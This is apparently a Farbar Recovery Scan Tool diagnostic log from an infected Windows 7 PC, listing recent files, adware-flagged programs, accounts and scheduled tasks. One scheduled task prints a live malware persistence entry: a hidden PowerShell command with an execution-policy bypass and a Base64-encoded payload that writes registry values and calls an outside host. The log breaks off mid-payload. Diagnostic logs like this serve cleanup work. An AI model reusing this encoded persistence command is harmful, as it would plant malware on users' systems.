2016-01-13 17:28 - 2015-04-16 18:33 - 00000000 ____D C:\Program Files (x86)\TheFreeDictionarycom Extension
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\LogMeInRemoteUser\AppData\Local\Google
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\LogMeInRemoteUser\AppData\Local\Comodo
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\HomeGroupUser$\AppData\Local\Torch
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\HomeGroupUser$\AppData\Local\Google
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\HomeGroupUser$\AppData\Local\Comodo
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\HomeGroupUser$
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\Guest\AppData\Local\Torch
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\Guest\AppData\Local\Google
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\Guest\AppData\Local\Comodo
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\Guest
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\Administrator\AppData\Local\Torch
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\Administrator\AppData\Local\Google
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\Administrator\AppData\Local\Comodo
2016-01-13 17:25 - 2014-08-01 16:05 - 00000000 ____D C:\Users\Administrator
2016-01-13 11:53 - 2015-07-27 08:32 - 00001064 _____ C:\Users\Public\Desktop\KNCTR.lnk
2016-01-13 11:53 - 2013-06-13 15:32 - 00002164 _____ C:\Users\Public\Desktop\HP Deskjet 3510 series.lnk
2016-01-13 11:53 - 2013-06-13 15:32 - 00001985 _____ C:\Users\Public\Desktop\HP Photo Creations.lnk
2016-01-13 11:53 - 2013-06-13 15:32 - 00001153 _____ C:\Users\Public\Desktop\Shop for Supplies - HP Deskjet 3510 series.lnk
2016-01-13 11:53 - 2013-02-16 21:30 - 00002597 _____ C:\Users\Public\Desktop\VPlayer.lnk
2016-01-13 11:53 - 2013-01-29 20:05 - 00002271 _____ C:\Users\Public\Desktop\WinZip.lnk
2016-01-13 11:53 - 2013-01-29 20:03 - 00001782 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vuze.lnk
2016-01-13 11:53 - 2013-01-29 20:03 - 00001776 _____ C:\Users\Public\Desktop\Vuze.lnk
2016-01-13 11:53 - 2012-10-21 08:48 - 00001060 _____ C:\Users\Public\Desktop\VLC media player.lnk
2016-01-13 11:53 - 2011-07-17 19:51 - 00001333 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
2016-01-13 11:53 - 2011-07-17 19:51 - 00001314 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
2016-01-13 11:53 - 2009-07-13 23:57 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-01-13 11:53 - 2009-07-13 23:57 - 00001292 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
2016-01-13 11:53 - 2009-07-13 23:57 - 00001234 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
2016-01-13 11:53 - 2009-07-13 23:54 - 00001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
2016-01-13 11:52 - 2015-07-27 13:52 - 00001398 _____ C:\Users\Nexus Media Server\Desktop\GoToAssist Customer.lnk
2016-01-13 11:52 - 2015-05-08 20:04 - 00002082 _____ C:\Users\Nexus Media Server\Desktop\Continue GamesDesktop Uninstaller.lnk
2016-01-13 11:52 - 2015-04-19 20:14 - 00002162 _____ C:\Users\Nexus Media Server\Desktop\Continue Games Desktop.lnk
2016-01-13 11:52 - 2015-04-19 20:14 - 00001019 _____ C:\Users\Nexus Media Server\Desktop\PepperZip.lnk
2016-01-13 11:52 - 2014-08-01 16:42 - 00001103 _____ C:\Users\Nexus Media Server\Desktop\Continue VuuPC Installation.lnk
2016-01-13 11:52 - 2014-08-01 16:06 - 00001949 _____ C:\Users\Nexus Media Server\Desktop\YTDownloader.lnk
2016-01-13 11:52 - 2014-08-01 16:05 - 00001951 _____ C:\Users\Nexus Media Server\Desktop\Sync Folder.lnk
2016-01-13 11:52 - 2014-01-31 01:13 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-01-13 11:52 - 2013-05-06 12:06 - 00001162 _____ C:\Users\Nexus Media Server\Desktop\SpeedAnalysis.lnk
2016-01-13 11:52 - 2013-01-29 20:05 - 00002283 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk
2016-01-13 11:52 - 2011-11-15 15:47 - 00001821 _____ C:\Users\Nexus Media Server\Desktop\NewsRover.lnk
2016-01-13 11:52 - 2011-10-27 10:22 - 00000991 _____ C:\Users\Nexus Media Server\Desktop\MakeMKV.lnk
2016-01-13 11:52 - 2009-07-14 00:01 - 00001218 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
2016-01-13 11:52 - 2009-07-13 23:49 - 00001246 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
2016-01-13 11:51 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\ModemLogs
2016-01-13 11:48 - 2015-06-06 16:57 - 00000000 ____D C:\ProgramData\AzekMui
2016-01-13 11:48 - 2013-01-29 16:46 - 00000000 ____D C:\Program Files\Vuze
2016-01-13 10:13 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\PLA
2016-01-13 00:57 - 2012-10-16 17:41 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-01-13 00:57 - 2012-10-08 17:11 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-01-13 00:57 - 2011-07-18 02:04 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-12 23:47 - 2015-04-14 18:33 - 00000000 ____D C:\Users\Nexus Media Server\AppData\LocalLow\Company
2016-01-12 22:57 - 2014-03-27 13:19 - 00306286 _____ C:\Windows\ntbtlog.txt
2016-01-12 22:26 - 2015-04-19 20:03 - 00000000 ____D C:\Program Files (x86)\Google
2016-01-12 22:16 - 2015-04-19 19:51 - 00000000 ____D C:\http_filter
2016-01-12 22:15 - 2015-04-14 19:02 - 00000004 _____ C:\Windows\SysWOW64\029B560A371F4E00AB32838EBC01B9E7
2016-01-01 02:57 - 2012-10-16 17:41 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-01-01 02:30 - 2015-04-14 18:02 - 00001334 _____ C:\Windows\Tasks\web_disco_notification_service.job
 
==================== Files in the root of some directories =======
 
2016-01-13 21:14 - 2016-01-13 21:14 - 6103040 _____ () C:\Program Files (x86)\GUT3586.tmp
2016-01-13 17:56 - 2016-01-13 17:56 - 6420480 _____ () C:\Program Files (x86)\GUTC2B3.tmp
2016-01-13 17:55 - 2016-01-13 17:55 - 6420480 _____ () C:\Program Files (x86)\GUTEE84.tmp
2016-01-13 21:36 - 2016-01-13 21:52 - 6420480 _____ () C:\Program Files (x86)\GUTF43E.tmp
2015-03-31 03:14 - 2015-03-31 03:14 - 0004387 _____ () C:\Users\Nexus Media Server\AppData\Roaming\cCDRV5n4y
2015-03-31 03:14 - 2015-03-31 03:14 - 0004387 _____ () C:\Users\Nexus Media Server\AppData\Roaming\CvJKhRrgZ6SzL9sF
2015-03-31 03:14 - 2015-03-31 03:14 - 0004387 _____ () C:\Users\Nexus Media Server\AppData\Roaming\FQfcQIFiv3
2015-03-31 03:14 - 2015-03-31 03:14 - 0004387 _____ () C:\Users\Nexus Media Server\AppData\Roaming\uhtMDtPmWQwdiB50O0t3a
2014-08-02 18:18 - 2015-07-27 07:14 - 0000182 _____ () C:\Users\Nexus Media Server\AppData\Roaming\WB.CFG
2015-05-08 20:01 - 2015-05-08 20:09 - 0011764 _____ () C:\Users\Nexus Media Server\AppData\Local\Temp-log.txt
2010-01-01 00:19 - 2010-01-01 00:19 - 0000000 _____ () C:\Users\Nexus Media Server\AppData\Local\Temp.dat
2016-01-13 17:56 - 2016-01-13 17:56 - 0000000 _____ () C:\Users\Nexus Media Server\AppData\Local\{C884F7E2-CF3E-4B3C-8204-C00A069D82E3}
2011-07-18 03:00 - 2011-07-19 03:14 - 0000040 ___SH () C:\ProgramData\.zreglib
2013-05-16 15:57 - 2013-05-16 15:57 - 0000000 _____ () C:\ProgramData\262c2b213c2d342d2d3a3530212f3a_c
2013-06-13 15:31 - 2013-06-13 15:31 - 0000057 _____ () C:\ProgramData\Ament.ini
2015-05-09 20:12 - 2015-06-28 12:08 - 0000112 _____ () C:\ProgramData\SS2x7H6M0.dat
2015-04-14 18:03 - 2015-05-04 17:07 - 0000036 _____ () C:\ProgramData\suguid.txt
 
Files to move or delete:
====================
C:\ProgramData\SS2x7H6M0.dat
 
 
Some files in TEMP:
====================
C:\Users\Nexus Media Server\AppData\Local\Temp\10862.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\14750.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\19124.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\19388.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\6330.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\71569_updater.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\72893_updater.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\CitrixOnlineLauncher.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\InstallUtil.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\of3w9136.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\Setup_132952.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\ShopperProJSINJFull.exe
C:\Users\Nexus Media Server\AppData\Local\Temp\SpOrder.dll
C:\Users\Nexus Media Server\AppData\Local\Temp\tmpddewfv.dll
C:\Users\Nexus Media Server\AppData\Local\Temp\Uninstall.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-01-16 02:07
 
==================== End of FRST.txt ============================
 
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:17-01-2015
Ran by Nexus Media Server (2016-01-01 03:06:36)
Running from C:\Users\Nexus Media Server\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2011-07-18 05:56:05)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2978377406-116969058-805938779-500 - Administrator - Disabled)
Guest (S-1-5-21-2978377406-116969058-805938779-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-2978377406-116969058-805938779-1014 - Limited - Enabled)
LogMeInRemoteUser (S-1-5-21-2978377406-116969058-805938779-1012 - Administrator - Enabled) => C:\Users\LogMeInRemoteUser
Nexus Media Server (S-1-5-21-2978377406-116969058-805938779-1000 - Administrator - Enabled) => C:\Users\Nexus Media Server
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.270 - Adobe Systems Incorporated)
AnyDVD (HKLM-x32\...\AnyDVD) (Version: 6.8.4.0 - SlySoft)
ATI Catalyst Install Manager (HKLM\...\{576A97E3-1A79-6215-49DE-AA358AF47420}) (Version: 3.0.769.0 - ATI Technologies, Inc.)
Boxee (HKLM-x32\...\BOXEE) (Version:  - Boxee)
ccc-core-static (x32 Version: 2010.0406.2133.36843 - ATI) Hidden
DnsBasic 1.0 build 123  (HKLM-x32\...\DnsBasic) (Version:  - )
DriverAgent by eSupport.com (HKLM-x32\...\DriverAgent_is1) (Version:  - Copyright © 2015 eSupport.com, Inc • All Rights Reserved)
DriverToolkit version 8.5.0.0 (HKLM-x32\...\{D66BF89F-B0A2-48F5-A2E4-242EB645AB76}_is1) (Version: 8.5.0.0 - Megaify Software)
FlashPlayer (HKLM-x32\...\{BA8B8ADA-084F-4F79-A0CA-6E58A0808794}) (Version: 1.6.8 - Tuguu SL) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
HP Deskjet 3510 series Basic Device Software (HKLM\...\{0AB0989D-2EBF-4772-830A-B370E0D7ED71}) (Version: 28.0.989.0 - Hewlett-Packard Co.)
HP Deskjet 3510 series Help (HKLM-x32\...\{97C1C98D-6AE5-4C71-9B00-EBBD9E014450}) (Version: 28.0.0 - Hewlett Packard)
HP Deskjet 3510 series Product Improvement Study (HKLM\...\{2CFC157D-6224-4072-9732-54DD8C07F334}) (Version: 28.0.989.0 - Hewlett-Packard Co.)
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Java™ 6 Update 23 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86416023FF}) (Version: 6.0.230 - Oracle)
KNCTR (HKLM-x32\...\Itibiti_is1) (Version:  - Itibiti Inc.)
lection (HKLM-x32\...\{55d4b236-fe79-4782-cc2d-55acaf147087}) (Version: 1.0.0 - subpar)
LG VZW United Drivers (HKLM-x32\...\{767618CE-02D4-40FA-9D6D-2DA69ACED9CA}) (Version: 2.11.1 - LG Electronics)
LogMeIn (HKLM-x32\...\{57573545-74EB-46D2-B362-AA05364E4ED8}) (Version: 4.1.1868 - LogMeIn, Inc.)
MakeMKV v1.6.8 (HKLM-x32\...\MakeMKV) (Version: v1.6.8 - GuinpinSoft inc)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft VC90 CRT + OMP (HKLM-x32\...\{0F931735-0098-4FF6-A49D-17882A294F51}) (Version: 1.0.0.0 - ZJMedia Ltd.)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
MotoHelper MergeModules (x32 Version: 1.2.0 - Motorola) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
News Rover -- Usenet newsreader (HKLM-x32\...\News Rover) (Version: 17.1 Rev. 0 - S&H Computer Systems)
PepperZip 2.0 (HKLM-x32\...\PepperZip) (Version: 2.0 - PepperWare Co.Ltd.) <==== ATTENTION
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.88.617.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5936 - Realtek Semiconductor Corp.)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.2380.0 - SAMSUNG Electronics Co., Ltd.)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1) (Version: 1.6.2 - Safer Networking Limited)
SUABnR (HKLM-x32\...\InstallShield_{2485354C-6B65-4978-BB91-CCE61442377B}) (Version: 1.1.0.13103_1 - Samsung Electronics Co., Ltd.)
SUABnR (x32 Version: 1.1.0.13103_1 - Samsung Electronics Co., Ltd.) Hidden
Update RGB (HKLM-x32\...\igsc) (Version: 1.0.0.0 - Update RGB)
Verizon Wireless Software Upgrade Assistant - Samsung(ar) (HKLM-x32\...\{EE296443-E401-43D2-9864-1C63AD8D376E}) (Version: 2.14.0410 - Samsung Electronics Co., Ltd.)
Verizon Wireless Software Utility Application for Android - Samsung (HKLM-x32\...\{69258FD1-F4EE-475A-83D1-BF68C8029592}) (Version: 2.14.0402 - Samsung Electronics Co., Ltd.)
VideoPerformer (HKLM-x32\...\VideoPerformer) (Version:  - PerformerSoft LLC) <==== ATTENTION
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
Vuze (HKLM\...\8461-7759-5462-8226) (Version: 5.3.0.0 - Azureus Software, Inc.)
Vuze Remote Toolbar v21.6 (HKLM-x32\...\{02EEE2FE-AB13-4410-B7ED-C225272D0FC8}) (Version: 21.6 - Spigot, Inc.) <==== ATTENTION
Windows Phone (HKLM-x32\...\{94550F69-BEF6-4C77-B1D5-4EEDEF839C37}) (Version: 0.9.3723.2 - Microsoft Corporation)
WinRAR archiver (HKLM\...\WinRAR archiver) (Version:  - )
WinZip 17.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240D7}) (Version: 17.0.10283 - WinZip Computing, S.L. )
YTDownloader (HKLM-x32\...\YTDownloader) (Version:  - YTDownloader) <==== ATTENTION
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {004783C0-9EA6-4286-9A05-E1787A0640AF} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-3 -> No File <==== ATTENTION
Task: {07202880-E71A-4494-90F4-574EA2ED61F3} - System32\Tasks\FQfcQIFiv3 => C:\Users\Nexus Media Server\AppData\Roaming\FQfcQIFiv3.exe <==== ATTENTION
Task: {08FF94D8-344C-4F30-BFB8-93A4C5C12220} - \winter_web_updating_service -> No File <==== ATTENTION
Task: {0AA08E94-3F52-4F9D-A4A8-6EE26ECF36FA} - System32\Tasks\cCDRV5n4y => C:\Users\Nexus Media Server\AppData\Roaming\cCDRV5n4y.exe <==== ATTENTION
Task: {0E3C542A-35A3-40E0-ACE2-9126251072DD} - \22a55d69-9f00-4e39-9983-8a08b1069524-1 -> No File <==== ATTENTION
Task: {106DC799-0B98-42D6-BCB4-3AC29DDAEC4A} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-1-7 -> No File <==== ATTENTION
Task: {10E01498-6644-4F73-B841-C1F525FFB3CF} - \APSnotifierPP3 -> No File <==== ATTENTION
Task: {117EF788-AC55-498B-BB16-289EADC64420} - \b917f354-73c6-437f-845a-847de7226630-1 -> No File <==== ATTENTION
Task: {11B20385-ACA6-459C-97EC-FE76D7101045} - \mr_fun_updating_service -> No File <==== ATTENTION
Task: {14F854AE-6BE4-4B91-98A0-576BD83F1EDD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-13] (Adobe Systems Incorporated)
Task: {1532EB26-4300-4818-BC84-C216413D6961} - \winter_web_notification_service -> No File <==== ATTENTION
Task: {1CF5901D-E3A5-4F4E-9DCD-9E35A532D005} - \Test TimeTrigger -> No File <==== ATTENTION
Task: {1E72DAC7-DBD4-4E7A-80C4-D07E7D1C4B1C} - \b917f354-73c6-437f-845a-847de7226630-4 -> No File <==== ATTENTION
Task: {1F33128F-00A1-42D0-9781-2ED1A35FFEAC} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-4 -> No File <==== ATTENTION
Task: {1FA7F172-78F3-4EFB-B4DA-060CB9CC7CD9} - \Plus-HD-1.2-codedownloader -> No File <==== ATTENTION
Task: {23DC0715-9230-40B6-8FB8-EDBBCE7A7A75} - \Plus-HD-1.2-updater -> No File <==== ATTENTION
Task: {28646BCD-AA5A-4084-91D0-9C4E529B0FB6} - \web_disco_updating_service -> No File <==== ATTENTION
Task: {2A792AF0-6139-410D-9109-8C24C91899EE} - System32\Tasks\{10094AC4-6FDF-47DF-9B33-8E017727F1E2} => pcalua.exe -a "C:\Users\Nexus Media Server\Downloads\colorcubesviz.exe" -d "C:\Users\Nexus Media Server\Downloads"
Task: {2B6E52E0-F459-43DE-8D0E-0337660B3F7E} - \Groovorio Updater -> No File <==== ATTENTION
Task: {2C8ACB8D-6D9B-4739-9DBE-515789E81AB0} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-1-6 -> No File <==== ATTENTION
Task: {2E10B7D0-E7AE-4BE1-9595-4EA395F4B8BE} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-1-6 -> No File <==== ATTENTION
Task: {2EDE5FD8-EC70-4522-BDEB-458252343090} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-01-13] (AVAST Software)
Task: {313D31B2-A09D-4CA3-9C36-4B082D485326} - System32\Tasks\{3C3CCF23-D2A6-1550-6302-F9C39BC5A975} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAcABvAHIAdABuAGUAdwAuAG4AZQB0AC8AdQAvAD8AcQA9AGEASABzAGQASQBjAGMANgBkAHcAdwBiADcAZABuADMARAA4AGEAdABNAEgAeQBQAEgAeQBwAEIAdQBjAGwAegBNAEgAQwBuAE8AVgBUAEwAVQBPAG4AegBLADMARAAyADkAOABlAHoARQBUAEQAdwB0AHkANgBFADUAbwBUAHUASQBsADYAWQBiAFcAWQB3AEgATQBtAHMAUAB0AHkANgBLAHEAQwAzAFcAQwBQAFkAUAA0AG4AUQBpAHAANgBLAFkAdQBSADIAZgB0AEgAYgBRAE8ARAB1AE0ASQBkAG8AaABLAE8AWgByAC0AdgA4AFgAVwB1AGcATABtAGMAbgB1AGwAdgBLAHkAMwBWAG8ARQA1AG8AVQAtAGgAcABiAGQAbQBOADMAcgBMAE8AYwBOAEMAYgBKAFoAbgBGAEcAaQBRAG4AMwAxAFkAdgAyAHMASABEADAANgB6AGEAdgBLAEUASgBDADUAVABrAFMAOABRAHUAegBfAEUAeABLADkAUQBrAGUASgBNADAAUAA1AEIASwBDAE0AQQBfADgAWAB5AFkAWgBSAHMASgBiADgAMwBjADAASABUAHcAdwA4AHEAUgBsAFAAZwBJAHEAbgA1AEYAZgAwAGQAUgBkAHkAUQBVAFEATQBiADMAQQBxADQANwBmADYATwBZAFIARwB4AFMALQBPAG0AZQBmAEwAdgBvAHAAcwBFAGIAQQA5AFgAMABCADAAdAA4AFgAZABMAEQATwB6AE0ANwB0AG4ANwBzAFQAMgBWAEsASABhADcAagBtAGEAYwBSAHMALQAtAGkAVABWAEsAcABnAEoAbgBFAEcAegBNADAAbQB3ADUAdgAxAEgARQBLAGQAegA4AFQAXwBDAGYAdABnAEUANQBtADcAegBxAHYAagBxAHIAegBQAFYANgAxAGEAYgBpAGsAOABkADUANgBFAEoAVwBIAEIARQA0AG4AOABTADYAQgBGADgAcAAwAHkANgBzAEkAVwBPAGoAbABtAGMAYgBKAHEAUwBnAEUAQgBsAEEAaQBZAGgASgBaAEIAagBWAHMALQBMADYAUABFAE0AYgB2AHIAUQBQAEwAVwBUAHkARgAwAFYAWQBMAFMALQBOAGYAMgA5AEMAVQAzAFMAUABLAEEAcgBUAGUAWABGAHQAVQBLAEUANAA2AHkAUgBCAFAASAB6AGoAQQBlAGsAYgBQAHQAcgBiAE4ANQBwAFAAcwBjACYAYwA9AFkAVwBWADEAbQA4AFIATQB3AE0AUQBjADYAVwBkAEcAbQBjAFEATQB4ADUAcQB5AE8AOQAwAEgASwB3AEcANwBmAHgAZABNAGUAcwBnAGYAbABnAEEAZQAtAG0ARAB3AE4ANgBTAHgAcwBIADYAegBI